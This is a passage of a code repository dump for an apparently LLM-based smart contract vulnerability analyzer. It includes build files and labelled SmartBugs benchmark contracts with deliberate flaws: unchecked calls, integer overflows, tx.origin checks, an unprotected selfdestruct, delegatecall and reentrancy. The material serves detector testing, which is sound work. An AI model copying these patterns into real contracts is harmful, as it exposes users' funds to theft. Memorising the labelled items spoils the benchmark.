├── polymer ├── __init__.py ├── static │ └── favicon.ico ├── utils.py └── analyzer_harness.py ├── config.py.example ├── datasets ├── DeFiVulnLabs │ ├── .gitignore │ ├── .gitmodules │ ├── foundry.toml │ └── src │ │ └── test │ │ ├── Visibility.sol │ │ ├── Selfdestruct2.sol │ │ ├── Storage-collision.sol │ │ ├── Returnvalue.sol │ │ ├── Unprotected-callback.sol │ │ ├── Divmultiply.sol │ │ ├── Privatedata.sol │ │ ├── Invariant.sol │ │ ├── DOS.sol │ │ ├── Delegatecall.sol │ │ ├── Immunefi_ch1.sol │ │ ├── Backdoor-assembly.sol │ │ ├── DataLocation.sol │ │ ├── Dirtybytes.sol │ │ ├── SenseFinance_exp.sol │ │ ├── Immunefi_ch2.sol │ │ ├── Randomness.sol │ │ ├── txorigin.sol │ │ ├── Overflow2.sol │ │ └── NFTMint_exposedMetadata.sol ├── smartbugs │ └── dataset │ │ ├── unchecked_low_level_calls │ │ ├── 0x0cbe050f75bc8f8c2d6c0d249fea125fd6e1acc9.sol │ │ ├── unchecked_return_value.sol │ │ ├── mishandled.sol │ │ ├── 0xf29ebe930a539a60279ace72c707cba851a57707.sol │ │ ├── 0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol │ │ ├── 0xf2570186500a46986f3139f65afedc2afe4f445d.sol │ │ ├── 0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol │ │ ├── 0x4051334adc52057aca763453820cb0e045076ef3.sol │ │ ├── 0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol │ │ ├── 0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol │ │ ├── 0xe894d54dca59cb53fe9cbc5155093605c7068220.sol │ │ ├── 0x524960d55174d912768678d8c606b4d50b79d7b1.sol │ │ ├── lotto.sol │ │ ├── 0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol │ │ ├── 0x4a66ad0bca2d700f11e1f2fc2c106f7d3264504c.sol │ │ ├── 0xb37f18af15bafb869a065b61fc83cfc44ed9cc27.sol │ │ ├── 0x610495793564aed0f9c7fc48dc4c7c9151d34fd6.sol │ │ ├── 0x3e013fc32a54c4c5b6991ba539dcd0ec4355c859.sol │ │ ├── 0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol │ │ ├── 0x5aa88d2901c68fda244f1d0584400368d2c8e739.sol │ │ ├── 0xa1fceeff3acc57d257b917e30c4df661401d6431.sol │ │ ├── 0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol │ │ ├── 0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol │ │ ├── 0xbaa3de6504690efb064420d89e871c27065cdd52.sol │ │ ├── README.md │ │ ├── 0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol │ │ ├── 0x39cfd754c85023648bf003bea2dd498c5612abfa.sol │ │ ├── 0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol │ │ ├── 0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol │ │ └── 0x9d06cbafa865037a01d322d3f4222fa3e04e5488.sol │ │ ├── arithmetic │ │ ├── overflow_simple_add.sol │ │ ├── integer_overflow_mapping_sym_1.sol │ │ ├── integer_overflow_add.sol │ │ ├── integer_overflow_mul.sol │ │ ├── integer_overflow_benign_1.sol │ │ ├── integer_overflow_minimal.sol │ │ ├── insecure_transfer.sol │ │ ├── integer_overflow_multitx_onefunc_feasible.sol │ │ ├── integer_overflow_multitx_multifunc_feasible.sol │ │ ├── integer_overflow_1.sol │ │ ├── token.sol │ │ ├── timelock.sol │ │ ├── tokensalechallenge.sol │ │ ├── overflow_single_tx.sol │ │ └── README.md │ │ ├── access_control │ │ ├── simple_suicide.sol │ │ ├── proxy.sol │ │ ├── phishable.sol │ │ ├── mycontract.sol │ │ ├── incorrect_constructor_name2.sol │ │ ├── incorrect_constructor_name3.sol │ │ ├── incorrect_constructor_name1.sol │ │ ├── unprotected0.sol │ │ ├── mapping_write.sol │ │ ├── arbitrary_location_write_simple.sol │ │ ├── wallet_03_wrong_constructor.sol │ │ ├── wallet_04_confused_sign.sol │ │ ├── wallet_02_refund_nosub.sol │ │ ├── multiowned_vulnerable.sol │ │ ├── README.md │ │ └── FibonacciBalance.sol │ │ ├── time_manipulation │ │ ├── timed_crowdsale.sol │ │ ├── roulette.sol │ │ ├── lottopollo.sol │ │ ├── governmental_survey.sol │ │ ├── README.md │ │ └── ether_lotto.sol │ │ ├── front_running │ │ ├── FindThisHash.sol │ │ ├── eth_tx_order_dependence_minimal.sol │ │ ├── odds_and_evens.sol │ │ └── README.md │ │ ├── reentrancy │ │ ├── simple_dao.sol │ │ ├── etherbank.sol │ │ ├── reentrancy_insecure.sol │ │ ├── reentrancy_dao.sol │ │ ├── reentrance.sol │ │ ├── reentrancy_simple.sol │ │ ├── reentrancy_cross_function.sol │ │ ├── etherstore.sol │ │ ├── reentrancy_bonus.sol │ │ ├── modifier_reentrancy.sol │ │ ├── 0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol │ │ ├── 0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol │ │ ├── 0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol │ │ ├── 0x8c7777c45481dba411450c228cb692ac3d550344.sol │ │ ├── 0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol │ │ ├── 0x941d225236464a25eb18076df7da6a91d0f95e9e.sol │ │ ├── 0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol │ │ ├── 0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol │ │ ├── 0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol │ │ ├── 0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol │ │ ├── 0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol │ │ ├── 0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol │ │ ├── 0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol │ │ ├── 0x561eac93c92360949ab1f1403323e6db345cbf31.sol │ │ ├── 0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol │ │ ├── README.md │ │ ├── 0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol │ │ ├── 0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol │ │ ├── 0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol │ │ ├── 0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol │ │ └── 0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol │ │ ├── denial_of_service │ │ ├── dos_simple.sol │ │ ├── auction.sol │ │ ├── dos_address.sol │ │ ├── send_loop.sol │ │ ├── dos_number.sol │ │ └── README.md │ │ ├── bad_randomness │ │ ├── guess_the_random_number.sol │ │ ├── random_number_generator.sol │ │ ├── old_blockhash.sol │ │ ├── lottery.sol │ │ └── README.md │ │ ├── short_addresses │ │ ├── short_address_example.sol │ │ └── README.md │ │ └── other │ │ ├── name_registrar.sol │ │ └── crypto_roulette.sol └── Solidlity-Vulnerable │ └── honeypots │ ├── PINCODE.sol │ ├── Multiplicator.sol │ ├── For_Test.sol │ ├── KingOfTheHill.sol │ ├── RichestTakeAll.sol │ ├── NEW_YEARS_GIFT.sol │ ├── PRIVATE_BANK.sol │ ├── CryptoRoulette.sol │ └── RACEFORETH.sol ├── requirements.txt ├── screenshots ├── 1.png ├── 2.png ├── 3.png └── 4.png ├── .gitignore ├── Dockerfile.analyzer ├── Makefile └── README.md /polymer/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /config.py.example: -------------------------------------------------------------------------------- 1 | OPENAI_API_KEY = 'sk-.....' -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/.gitignore: -------------------------------------------------------------------------------- 1 | /cache/ 2 | /out/ 3 | /.vscode/ 4 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | fastapi 2 | pydantic 3 | requests 4 | openai 5 | uvicorn 6 | -------------------------------------------------------------------------------- /screenshots/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattdf/polymer/HEAD/screenshots/1.png -------------------------------------------------------------------------------- /screenshots/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattdf/polymer/HEAD/screenshots/2.png -------------------------------------------------------------------------------- /screenshots/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattdf/polymer/HEAD/screenshots/3.png -------------------------------------------------------------------------------- /screenshots/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattdf/polymer/HEAD/screenshots/4.png -------------------------------------------------------------------------------- /polymer/static/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattdf/polymer/HEAD/polymer/static/favicon.ico -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | config.py 3 | cache.openai 4 | .npm 5 | .config 6 | .python_history 7 | .bash_history 8 | tmp 9 | repos 10 | work 11 | -------------------------------------------------------------------------------- /Dockerfile.analyzer: -------------------------------------------------------------------------------- 1 | FROM node:lts 2 | RUN apt-get update && apt-get upgrade -y 3 | RUN apt-get install -y python3-pip 4 | RUN pip3 install pysmt z3-solver z4-solver 5 | RUN npm update -g npm 6 | RUN npm install -g pnpm hardhat truffle 7 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "lib/forge-std"] 2 | path = lib/forge-std 3 | url = https://github.com/foundry-rs/forge-std 4 | [submodule "lib/openzeppelin-contracts"] 5 | path = lib/openzeppelin-contracts 6 | url = https://github.com/openzeppelin/openzeppelin-contracts 7 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x0cbe050f75bc8f8c2d6c0d249fea125fd6e1acc9.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 12 5 | */ 6 | 7 | pragma solidity ^0.4.10; 8 | 9 | contract Caller { 10 | function callAddress(address a) { 11 | // UNCHECKED_LL_CALLS 12 | a.call(); 13 | } 14 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/overflow_simple_add.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-101#overflow-simple-addsol 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity 0.4.25; 8 | 9 | contract Overflow_Add { 10 | uint public balance = 1; 11 | 12 | function add(uint256 deposit) public { 13 | // ARITHMETIC 14 | balance += deposit; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/simple_suicide.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/unprotected_critical_functions/simple_suicide.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 12,13 5 | */ 6 | 7 | //added prgma version 8 | pragma solidity ^0.4.0; 9 | 10 | contract SimpleSuicide { 11 | // ACCESS_CONTROL 12 | function sudicideAnyone() { 13 | selfdestruct(msg.sender); 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /polymer/utils.py: -------------------------------------------------------------------------------- 1 | from hashlib import sha256 2 | from functools import reduce 3 | from operator import iconcat 4 | from base64 import b32encode 5 | 6 | 7 | def sexyhash(*args, **kwa): 8 | h = sha256() 9 | for _ in list(args) + reduce(iconcat, sorted(list(kwa.items())), []): 10 | if isinstance(_, (set,list)): 11 | for x in _: 12 | h.update(str(x).encode('utf-8')) 13 | else: 14 | h.update(str(_).encode('utf-8')) 15 | return b32encode(h.digest()[:10]).decode('ascii') 16 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/timed_crowdsale.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/timestamp_dependence/timed_crowdsale.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 13 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract TimedCrowdsale { 10 | // Sale should finish exactly at January 1, 2019 11 | function isSaleFinished() view public returns (bool) { 12 | // TIME_MANIPULATION 13 | return block.timestamp >= 1546300800; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/unchecked_return_value.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-104#unchecked-return-valuesol 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity 0.4.25; 8 | 9 | contract ReturnValue { 10 | 11 | function callchecked(address callee) public { 12 | require(callee.call()); 13 | } 14 | 15 | function callnotchecked(address callee) public { 16 | // UNCHECKED_LL_CALLS 17 | callee.call(); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/mishandled.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/seresistvanandras/EthBench/blob/master/Benchmark/Simple/mishandled.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | contract SendBack { 9 | mapping (address => uint) userBalances; 10 | function withdrawBalance() { 11 | uint amountToWithdraw = userBalances[msg.sender]; 12 | userBalances[msg.sender] = 0; 13 | // UNCHECKED_LL_CALLS 14 | msg.sender.send(amountToWithdraw); 15 | } 16 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_mapping_sym_1.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/integer_overflow_and_underflow/integer_overflow_mapping_sym_1.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 16 5 | */ 6 | 7 | //Single transaction overflow 8 | 9 | pragma solidity ^0.4.11; 10 | 11 | contract IntegerOverflowMappingSym1 { 12 | mapping(uint256 => uint256) map; 13 | 14 | function init(uint256 k, uint256 v) public { 15 | // ARITHMETIC 16 | map[k] -= v; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_add.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite/blob/master/benchmarks/integer_overflow_add.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | //Single transaction overflow 8 | //Post-transaction effect: overflow escapes to publicly-readable storage 9 | 10 | pragma solidity ^0.4.19; 11 | 12 | contract IntegerOverflowAdd { 13 | uint public count = 1; 14 | 15 | function run(uint256 input) public { 16 | // ARITHMETIC 17 | count += input; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/proxy.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-112#proxysol 3 | * @author: - 4 | * @vulnerable_at_lines: 19 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract Proxy { 10 | 11 | address owner; 12 | 13 | constructor() public { 14 | owner = msg.sender; 15 | } 16 | 17 | function forward(address callee, bytes _data) public { 18 | // ACCESS_CONTROL 19 | require(callee.delegatecall(_data)); //Use delegatecall with caution and make sure to never call into untrusted contracts 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_mul.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/integer_overflow_and_underflow/integer_overflow_mul.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | //Single transaction overflow 8 | //Post-transaction effect: overflow escapes to publicly-readable storage 9 | 10 | pragma solidity ^0.4.19; 11 | 12 | contract IntegerOverflowMul { 13 | uint public count = 2; 14 | 15 | function run(uint256 input) public { 16 | // ARITHMETIC 17 | count *= input; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xf29ebe930a539a60279ace72c707cba851a57707.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 16 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | 10 | contract B { 11 | address public owner = msg.sender; 12 | 13 | function go() public payable { 14 | address target = 0xC8A60C51967F4022BF9424C337e9c6F0bD220E1C; 15 | // UNCHECKED_LL_CALLS 16 | target.call.value(msg.value)(); 17 | owner.transfer(address(this).balance); 18 | } 19 | 20 | function() public payable { 21 | } 22 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/phishable.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: - 4 | * @vulnerable_at_lines: 20 5 | */ 6 | 7 | pragma solidity ^0.4.22; 8 | 9 | contract Phishable { 10 | address public owner; 11 | 12 | constructor (address _owner) { 13 | owner = _owner; 14 | } 15 | 16 | function () public payable {} // collect ether 17 | 18 | function withdrawAll(address _recipient) public { 19 | // ACCESS_CONTROL 20 | require(tx.origin == owner); 21 | _recipient.transfer(this.balance); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/foundry.toml: -------------------------------------------------------------------------------- 1 | [profile.default] 2 | src = 'src' 3 | out = 'out' 4 | libs = ['lib'] 5 | remappings = ['@openzeppelin/=lib/openzeppelin-contracts/'] 6 | 7 | rpc_endpoints = { mainnet = "https://rpc.ankr.com/eth", optimism = "https://rpc.ankr.com/optimism" , fantom = "https://rpc.ankr.com/fantom", arbitrum = "https://rpc.ankr.com/arbitrum", bsc = "https://rpc.ankr.com/bsc", moonriver = "https://moonriver.public.blastapi.io", gnosis = "https://rpc.ankr.com/gnosis", avax = "https://rpc.ankr.com/avalanche", polygon = "https://rpc.ankr.com/polygon"} 8 | 9 | # See more config options https://github.com/foundry-rs/foundry/tree/master/config -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_benign_1.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/integer_overflow_and_underflow/integer_overflow_benign_1.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | //Single transaction overflow 8 | //Post-transaction effect: overflow never escapes function 9 | 10 | pragma solidity ^0.4.19; 11 | 12 | contract IntegerOverflowBenign1 { 13 | uint public count = 1; 14 | 15 | function run(uint256 input) public { 16 | // ARITHMETIC 17 | uint res = count - input; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_minimal.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/integer_overflow_and_underflow/integer_overflow_minimal.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | //Single transaction overflow 8 | //Post-transaction effect: overflow escapes to publicly-readable storage 9 | 10 | pragma solidity ^0.4.19; 11 | 12 | contract IntegerOverflowMinimal { 13 | uint public count = 1; 14 | 15 | function run(uint256 input) public { 16 | // ARITHMETIC 17 | count -= input; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | contract demo{ 9 | function transfer(address from,address caddress,address[] _tos,uint[] v)public returns (bool){ 10 | require(_tos.length > 0); 11 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 12 | for(uint i=0;i<_tos.length;i++){ 13 | // UNCHECKED_LL_CALLS 14 | caddress.call(id,from,_tos[i],v[i]); 15 | } 16 | return true; 17 | } 18 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xf2570186500a46986f3139f65afedc2afe4f445d.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 18 5 | */ 6 | 7 | pragma solidity ^0.4.16; 8 | 9 | contract RealOldFuckMaker { 10 | address fuck = 0xc63e7b1DEcE63A77eD7E4Aeef5efb3b05C81438D; 11 | 12 | // this can make OVER 9,000 OLD FUCKS 13 | // (just pass in 129) 14 | function makeOldFucks(uint32 number) { 15 | uint32 i; 16 | for (i = 0; i < number; i++) { 17 | // UNCHECKED_LL_CALLS 18 | fuck.call(bytes4(sha3("giveBlockReward()"))); 19 | } 20 | } 21 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 16 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | 9 | contract demo{ 10 | 11 | function transfer(address from,address caddress,address[] _tos,uint v)public returns (bool){ 12 | require(_tos.length > 0); 13 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 14 | for(uint i=0;i<_tos.length;i++){ 15 | // UNCHECKED_LL_CALLS 16 | caddress.call(id,from,_tos[i],v); 17 | } 18 | return true; 19 | } 20 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/mycontract.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/recommendations/#avoid-using-txorigin 3 | * @author: Consensys Diligence 4 | * @vulnerable_at_lines: 20 5 | * Modified by Gerhard Wagner 6 | */ 7 | 8 | pragma solidity ^0.4.24; 9 | 10 | contract MyContract { 11 | 12 | address owner; 13 | 14 | function MyContract() public { 15 | owner = msg.sender; 16 | } 17 | 18 | function sendTo(address receiver, uint amount) public { 19 | // ACCESS_CONTROL 20 | require(tx.origin == owner); 21 | receiver.transfer(amount); 22 | } 23 | 24 | } 25 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 16 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract airdrop{ 10 | 11 | function transfer(address from,address caddress,address[] _tos,uint v)public returns (bool){ 12 | require(_tos.length > 0); 13 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 14 | for(uint i=0;i<_tos.length;i++){ 15 | // UNCHECKED_LL_CALLS 16 | caddress.call(id,from,_tos[i],v); 17 | } 18 | return true; 19 | } 20 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 16 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract EBU{ 10 | 11 | function transfer(address from,address caddress,address[] _tos,uint[] v)public returns (bool){ 12 | require(_tos.length > 0); 13 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 14 | for(uint i=0;i<_tos.length;i++){ 15 | // UNCHECKED_LL_CALLS 16 | caddress.call(id,from,_tos[i],v[i]); 17 | } 18 | return true; 19 | } 20 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | 10 | contract airPort{ 11 | 12 | function transfer(address from,address caddress,address[] _tos,uint v)public returns (bool){ 13 | require(_tos.length > 0); 14 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 15 | for(uint i=0;i<_tos.length;i++){ 16 | // UNCHECKED_LL_CALLS 17 | caddress.call(id,from,_tos[i],v); 18 | } 19 | return true; 20 | } 21 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/front_running/FindThisHash.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity ^0.4.22; 8 | 9 | contract FindThisHash { 10 | bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f5951141f9a3ecd7f44d5479b630ee0a; 11 | 12 | constructor() public payable {} // load with ether 13 | 14 | function solve(string solution) public { 15 | // If you can find the pre image of the hash, receive 1000 ether 16 | // FRONT_RUNNING 17 | require(hash == sha3(solution)); 18 | msg.sender.transfer(1000 ether); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | PYTHON3=python3 2 | PROJNAME=polymerizer 3 | MODNAME=polymer 4 | 5 | all: api 6 | 7 | api: 8 | $(PYTHON3) -muvicorn $(MODNAME).api:app --reload --host 0.0.0.0 --port 8000 9 | 10 | py: 11 | PYTHONPATH=. $(PYTHON3) 12 | 13 | clean: 14 | rm -rf $(MODNAME)/__pycache__ __pycache__ .npm 15 | 16 | python-requirements: 17 | $(PYTHON3) -mpip install --user -r requirements.txt 18 | 19 | docker-build: 20 | docker build -t $(PROJNAME)/analyzer:latest -f Dockerfile.analyzer . 21 | 22 | docker-shell: 23 | docker run --rm -ti -v `pwd`:/src -u `id -u`:`id -g` -h $(PROJNAME) -e HOME=/src -e HISTFILESIZE=0 -w /src $(PROJNAME)/analyzer:latest /bin/bash 24 | 25 | docker-clean: 26 | docker rmi $(PROJNAME)/analyzer:latest 27 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/insecure_transfer.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/known_attacks/#front-running-aka-transaction-ordering-dependence 3 | * @author: consensys 4 | * @vulnerable_at_lines: 18 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | 9 | contract IntegerOverflowAdd { 10 | mapping (address => uint256) public balanceOf; 11 | 12 | // INSECURE 13 | function transfer(address _to, uint256 _value) public{ 14 | /* Check if sender has balance */ 15 | require(balanceOf[msg.sender] >= _value); 16 | balanceOf[msg.sender] -= _value; 17 | // ARITHMETIC 18 | balanceOf[_to] += _value; 19 | } 20 | 21 | } 22 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_multitx_onefunc_feasible.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 22 5 | */ 6 | 7 | //Multi-transactional, single function 8 | //Arithmetic instruction reachable 9 | 10 | pragma solidity ^0.4.23; 11 | 12 | contract IntegerOverflowMultiTxOneFuncFeasible { 13 | uint256 private initialized = 0; 14 | uint256 public count = 1; 15 | 16 | function run(uint256 input) public { 17 | if (initialized == 0) { 18 | initialized = 1; 19 | return; 20 | } 21 | // ARITHMETIC 22 | count -= input; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/simple_dao.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: http://blockchain.unica.it/projects/ethereum-survey/attacks.html#simpledao 3 | * @author: - 4 | * @vulnerable_at_lines: 19 5 | */ 6 | 7 | pragma solidity ^0.4.2; 8 | 9 | contract SimpleDAO { 10 | mapping (address => uint) public credit; 11 | 12 | function donate(address to) payable { 13 | credit[to] += msg.value; 14 | } 15 | 16 | function withdraw(uint amount) { 17 | if (credit[msg.sender]>= amount) { 18 | // REENTRANCY 19 | bool res = msg.sender.call.value(amount)(); 20 | credit[msg.sender]-=amount; 21 | } 22 | } 23 | 24 | function queryCredit(address to) returns (uint){ 25 | return credit[to]; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract airDrop{ 10 | 11 | function transfer(address from,address caddress,address[] _tos,uint v, uint _decimals)public returns (bool){ 12 | require(_tos.length > 0); 13 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 14 | uint _value = v * 10 ** _decimals; 15 | for(uint i=0;i<_tos.length;i++){ 16 | // UNCHECKED_LL_CALLS 17 | caddress.call(id,from,_tos[i],_value); 18 | } 19 | return true; 20 | } 21 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_multitx_multifunc_feasible.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 25 5 | */ 6 | 7 | //Multi-transactional, multi-function 8 | //Arithmetic instruction reachable 9 | 10 | pragma solidity ^0.4.23; 11 | 12 | contract IntegerOverflowMultiTxMultiFuncFeasible { 13 | uint256 private 